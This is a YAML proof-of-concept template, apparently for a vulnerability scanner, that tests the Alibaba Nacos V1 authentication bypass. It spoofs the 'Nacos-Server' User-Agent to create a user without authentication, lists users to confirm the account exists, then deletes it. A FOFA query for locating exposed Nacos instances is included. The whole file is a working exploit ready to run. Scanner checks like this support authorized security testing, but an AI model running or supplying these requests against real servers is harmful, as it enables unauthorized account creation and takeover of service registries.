id: nacos-v1-auth-bypass

info:
    name: Alibaba Nacos V1 Auth Bypass
    author: kmahyyg(https://github.com/kmahyyg)
    severity: high
    description: fofa app="NACOS"

set:
    r1: randomLowercase(16)
    r2: randomLowercase(16)
rules:
    r0:
        request:
            method: POST
            path: /nacos/v1/auth/users?username={{r1}}&password={{r2}}
            headers:
                User-Agent: Nacos-Server
        expression: response.status == 200 && response.body.bcontains(bytes("create user ok!"))
    r1:
        request:
            method: GET
            path: /nacos/v1/auth/users?pageNo=1&pageSize=999
            headers:
                User-Agent: Nacos-Server
        expression: response.status == 200 && response.body.bcontains(bytes(r1))
    r2:
        request:
            method: DELETE
            path: /nacos/v1/auth/users?username={{r1}}
            headers:
                User-Agent: Nacos-Server
        expression: response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
expression: r0() && r1() && r2()
